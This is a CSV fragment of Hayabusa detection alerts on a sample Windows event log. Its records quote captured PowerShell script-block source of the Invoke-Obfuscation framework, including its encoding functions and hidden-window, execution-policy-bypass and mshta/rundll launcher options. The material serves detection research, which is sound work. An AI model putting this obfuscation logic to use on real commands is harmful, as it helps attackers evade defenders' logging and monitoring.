If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. 
Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock 
-PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. 
$UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element 
in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. 
Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock 
-PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). 
If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. 
Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. 
$Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). 
If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). 
If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. 
Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. 
$Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains $UserInput.Trim().Split(' ')[0])) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" You haven't applied any obfuscation.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } ElseIf($Script:ObfuscatedCommand -ne '') { # Get file path information from compound user input (e.g. OUT C:\FILENAME.TXT). 
If($UserInput.Trim().Split(' ').Count -gt 1) { # Get file path information from user input. $UserInputOutputFilePath = $UserInput.Trim().SubString(4).Trim() Write-Host '' } Else { # Get file path information from user interactively. $UserInputOutputFilePath = Read-Host ""`n`nEnter path for output file (or leave blank for default)"" } # Decipher if user input a full file path, just a file name or nothing (default). If($UserInputOutputFilePath.Trim() -eq '') { # User did not input anything so use default filename and current directory of this script. $OutputFilePath = ""$ScriptDir\Obfuscated_Command.txt"" } ElseIf(!($UserInputOutputFilePath.Contains('\')) -AND !($UserInputOutputFilePath.Contains('/'))) { # User input is not a file path so treat it as a filename and use current directory of this script. $OutputFilePath = ""$ScriptDi",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"r\$($UserInputOutputFilePath.Trim())"" } Else { # User input is a full file path. $OutputFilePath = $UserInputOutputFilePath } # Write ObfuscatedCommand out to disk. 
Write-Output $Script:ObfuscatedCommand > $OutputFilePath If($Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host "".`nA Launcher has been applied so this script cannot be run as a standalone .ps1 file."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } ElseIf(!$Script:LauncherApplied -AND (Test-Path $OutputFilePath)) { $Script:CliSyntax += ""out $OutputFilePath"" Write-Host ""`nSuccessfully output ObfuscatedCommand to"" -NoNewLine -ForegroundColor Cyan Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" -ForegroundColor Cyan C:\Windows\Notepad.exe $OutputFilePath } Else { Write-Host ""`nERROR: Unable to write ObfuscatedCommand out to"" -NoNewLine -ForegroundColor Red Write-Host "" $OutputFilePath"" -NoNewLine -ForegroundColor Yellow } } ElseIf($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" There isn't anything to write out to disk.`n Just enter"" -NoNewLine Write-Host "" SHOW OPTIONS"" -NoNewLine -ForegroundColor Yellow Write-Host "" and look at ObfuscatedCommand."" } } ElseIf($CopyToClipboardInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne '') -AND ($Script:ObfuscatedCommand -ceq $Script:ScriptBlock)) { Write-Host 